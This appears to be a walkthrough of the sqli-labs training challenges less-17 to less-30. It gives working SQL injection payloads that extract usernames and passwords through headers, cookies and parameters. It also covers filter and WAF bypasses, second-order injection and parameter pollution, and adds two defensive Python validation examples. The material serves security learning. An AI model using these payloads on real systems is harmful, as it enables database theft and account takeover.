less-17

At first I found that uname was caught by the WAF and kept looking for a way to bypass it, but the real task is finding the best injection point, so I injected through passwd instead, which also gives error output.

payload:

User Name:admin
New Password:1' and updatexml(1,concat(0x7e,(select concat(id,username,password) from (select id,username,password from users LIMIT 0,1)a),0x7e),1)#

less-18

User-Agent injection, error-based as well; you have to log in successfully before the User-Agent gets inserted.

payload:

User-Agent:1' and updatexml(1,concat(0x7e,(select concat(id,username,password)from users limit 0,1),0x7e),1) and '1'='1

uname=admin&passwd=1&submit=Submit

less-19

Referer injection; payload same as above.

Referer:1' and updatexml(1,concat(0x7e,(select concat(id,username,password)from users LIMIT 0,1),0x7e),1) and '1'='1

uname=admin&passwd=1&submit=Submit

less-20

Cookie injection; the Submit parameter must not be sent.
payload:

Cookie:uname=admin' and updatexml(1,concat(0x7e,(select concat(id,username,password)from users LIMIT 0,1),0x7e),1) and '1'='1

uname=admin&passwd=123456

less-21

The cookie is base64-decoded, so base64-encode the injection statement.
payload:

Cookie:YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZClmcm9tIHVzZXJzIExJTUlUIDAsMSksMHg3ZSksMSkgYW5kICcxJz0nMQ==


less-22

The single-quote closure becomes a double quote.
payload:

Cookie:uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZClmcm9tIHVzZXJzIExJTUlUIDAsMSksMHg3ZSksMSkj
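
The defensive side of less-21 and less-22: decoding a base64 cookie is not validation, so the decoded value has to be checked before it goes anywhere near a query. The following is an added Python example, not code from the lab or the post; the username whitelist, the log line format and the sample cookies are constructed for this example.

```python
import base64
import binascii
import re

# Constructed samples for this example (not the lab's cookies): a benign
# value and one carrying a quote character, both base64-encoded the way the
# less-21/22 uname cookie is.
BENIGN_COOKIE = base64.b64encode(b"admin").decode("ascii")
HOSTILE_COOKIE = base64.b64encode(b"admin' and 1=1").decode("ascii")

# Assumed policy for this example: what a username is allowed to look like.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,30}")

# Constructed access-log lines in the shape "<ip> - Cookie: uname=<value>".
COOKIE_LOG = [
    "203.0.113.5 - Cookie: uname=" + BENIGN_COOKIE,
    "203.0.113.7 - Cookie: uname=" + HOSTILE_COOKIE,
    "203.0.113.9 - Cookie: uname=not-base64!!",
]


def decode_uname_cookie(value: str):
    """Decode a base64 'uname' cookie and return the username, or None.

    The cookie is client-controlled, so the decoded bytes are checked
    against the whitelist before they are returned; anything that is not
    valid base64, not valid UTF-8, or not a plain username is rejected.
    """
    try:
        raw = base64.b64decode(value, validate=True)
        name = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    if USERNAME_RE.fullmatch(name) is None:
        return None
    return name


def scan_cookie_log(lines):
    """Return the source IPs whose uname cookie fails validation.

    Useful for spotting, after the fact, which clients sent a cookie that
    decodes to something other than a username.
    """
    flagged = []
    for line in lines:
        m = re.search(r"^(\S+) .*Cookie: uname=(\S+)", line)
        if not m:
            continue
        ip, cookie = m.group(1), m.group(2)
        if decode_uname_cookie(cookie) is None:
            flagged.append(ip)
    return flagged


if __name__ == "__main__":
    print(decode_uname_cookie(BENIGN_COOKIE))   # admin
    print(decode_uname_cookie(HOSTILE_COOKIE))  # None
    print(scan_cookie_log(COOKIE_LOG))
```

Even with the whitelist in place, the username should still be bound as a query parameter rather than concatenated; the whitelist only narrows what reaches the database, it does not replace parameterisation.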


less-23

The comment characters are filtered, so splice the closing quote in instead.

There are two ways to construct it:
One:

SELECT * FROM users WHERE id='0' union select 1,(select group_concat(schema_name)from information_schema.schemata),'1'

Two:

SELECT * FROM users WHERE id='0' union select 1, group_concat(table_name),'1' FROM information_schema.tables WHERE table_schema=database() and '1'='1'

The second form only works when there is a condition (WHERE) to attach the closing to.

Dump databases:

id=0' union select 1,(select group_concat(schema_name)from information_schema.schemata),'1

Dump tables:

id=0' union select 1, group_concat(table_name),'1' FROM information_schema.tables WHERE table_schema=database() and '1'='1

Dump columns:

id=0' union select 1, group_concat(column_name),'1' FROM information_schema.columns WHERE table_name='users' and '1'='1

Dump values:

id=0' union select 1,(select group_concat(id) from users),'1

less-24

This one tests second-order injection.

Register an account:

Username:admin'#
Password:123456


During registration, mysql_escape_string escapes the single quote, so admin'# does not close the string; login is handled the same way.
After logging in, $_SESSION['username']=admin'#. On password change, $_SESSION['username'] is not escaped, so the statement becomes

UPDATE users SET PASSWORD='$pass' where username='admin'# and password='$curr_pass'

The single quote is closed and the rest of the WHERE clause is commented out, so the password of the admin account gets changed.

less-25

or/AND are filtered case-insensitively, but you can inject without them.

0' union select 1,1,concat(id,username,passwoorrd) from users LIMIT 0,1%23

Error-based injection needs or/AND; || can be used instead, or double-writing gets past the filter.

0' aandnd updatexml(1,concat(0x7e,(select concat(id,username,passwoorrd)from users LIMIT 0,1),0x7e),1)%23
0' || updatexml(1,concat(0x7e,(select concat(id,username,passwoorrd)from users LIMIT 0,1),0x7e),1)%23

less-25a

Same as before, the normal injection works; it just no longer outputs the error.

0 union select 1,1,concat(id,username,passwoorrd) from users%23

less-26

Set up sqli-labs on Linux.

Spaces are filtered and the comment characters are gone too.
Use %a0 for spaces; since comments are gone, close with a single quote at the end instead.
Try:

id=0%27%a0union%a0select%a01,2,%273


Dump databases:

id=0%27%a0union%a0select%a01,(SELECT%a0group_concat(schema_name)%a0FROM%a0infoorrmation_schema.schemata),%273

Dump tables:

id=0%27%a0union%a0select%a01,(SELECT%a0group_concat(table_name)%a0FROM%a0infoorrmation_schema.tables%a0WHERE%a0table_schema=database()),%273

Dump columns:

id=0%27%a0union%a0select%a01,(SELECT%a0group_concat(column_name)%a0FROM%a0infoorrmation_schema.columns%a0WHERE%a0table_name='users'),%273

Dump values:

id=0%27%a0union%a0select%a01,(SELECT%a0concat(id,username,passwoorrd)%a0FROM%a0users%a0LIMIT%a00,1),%273

Error-based payload:

id=0%27%a0||%a0updatexml(1,concat(0x7e,(select%a0concat(id,username,passwoorrd)from%a0users%a0limit%20%a00,1),0x7e),1)%a0anandd%a0%271%27=%271

less-26a

The only change from less-26 is the closing, and error-based injection no longer works.

payload:

id=0%27)%a0union%a0select%a01,(SELECT%a0concat(id,username,passwoorrd)%a0FROM%a0users%a0LIMIT%a00,1),(%273

less-27

Spaces are filtered, and select/SELECT is filtered, but mixed case gets through.

Try injecting:

id=0%27%a0UniOn%a0SeLect%a01,2,%273

Success.
payload:

id=0%27%a0UniOn%a0SelEct%a01,(sELeCT%a0concat(id,username,password)%a0FROM%a0users%a0LIMIT%a00,1),%273

less-27a

There is query output, so inject directly.
Current database:

id=0"%a0UnIOn%a0SEleCt%a01,database(),"3

payload:

id=0"%a0UniOn%a0SelEct%a01,(sELeCT%a0concat(id,username,password)%a0FROM%a0users%a0LIMIT%a00,1),"3

less-28

The less-27 approach gets through.
union select is filtered case-insensitively; using %a0 for spaces keeps the regex from matching.

id=0')%a0union%a0select%a01,database(),('3

less-28a

id=0%27)%20union%a0select%201,2,3%23

less-29

Feels like the challenge was set up wrong; it is the same as less-1.

id=0%27union%20select%201,2,3%23

Got results successfully.

less-30

less-30 is fun: the challenge is in login.php.
An invincible WAF:

function whitelist($input)
{
    // Only an all-digit value passes: the regex is anchored at both ends
    $match = preg_match("/^\d+$/", $input);
    if($match)
    {
        //echo "you are good";
        //return $match;
    }
    else
    {
        // Anything else is redirected to hacked.php
        header('Location: hacked.php');
        //echo "you are bad";
    }
}

Only digits allowed, 2333 (lol), sob.
But then look at the java_implimentation function:

function java_implimentation($query_string)
{
    $q_s = $query_string;
    // Splits the raw QUERY_STRING on '&' itself instead of reading $_GET
    $qs_array= explode("&",$q_s);


    foreach($qs_array as $key => $value)
    {
        // Looks only at the first two characters of each "key=value" chunk
        $val=substr($value,0,2);
        if($val=="id")
        {
            // Returns the first id value found (up to 30 chars after "id=")
            $id_value=substr($value,3,30);
            return $id_value;
            echo "<br>";
            break;
        }

    }

}

QUERY_STRING is split on &, and as soon as an id is reached its value is returned.
payload:

?id=1&id="union select 1,2,3%23

$id1 equals 1 and passes the check, while id="union select 1,2,3%23 goes into the query, forming

SELECT * FROM users WHERE id=""union select 1,2,3%23
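
The root cause in less-30 is two parsers disagreeing about a repeated parameter: the whitelist checks one copy of id and the hand-rolled query-string parser hands a different copy to the query. The following is an added Python example, not the lab's PHP: it reproduces both parsing behaviours for comparison and then shows the defensive version, which uses a single parser, refuses a parameter that appears more than once, and validates the value as ASCII digits before it is used. The function names are this example's own.

```python
import re
from urllib.parse import parse_qs


def first_id_like_lab(query_string):
    """Mimics java_implimentation(): split on '&', return the value of the
    first chunk whose first two characters are 'id' (30 chars after 'id=')."""
    for part in query_string.split("&"):
        if part[:2] == "id":
            return part[3:33]
    return None


def last_id_like_php(query_string):
    """Mimics PHP's $_GET, which keeps the last occurrence of a repeated key."""
    value = None
    for part in query_string.split("&"):
        key, _, val = part.partition("=")
        if key == "id":
            value = val
    return value


def extract_id(query_string):
    """Defensive version: one parser, no duplicates, validated before use.

    Returns the id as an int, or None when it is missing, repeated, or not
    made of ASCII digits. Whatever the check sees is exactly what the query
    gets, because there is only one extraction step.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    values = params.get("id", [])
    if len(values) != 1:
        return None  # missing or repeated: refuse rather than pick one copy
    value = values[0]
    # str.isdigit() also accepts non-ASCII digits, so use an explicit pattern
    if re.fullmatch(r"[0-9]+", value) is None:
        return None
    return int(value)


if __name__ == "__main__":
    doubled = "id=1&id=2"
    print(first_id_like_lab(doubled), last_id_like_php(doubled))  # 1 2
    print(extract_id(doubled))   # None
    print(extract_id("id=42"))   # 42
```

Rejecting duplicates is the simplest robust rule; if the application must tolerate repeated parameters, the check and the query must at least read the same copy, which in practice means extracting the value once and passing that single variable to both.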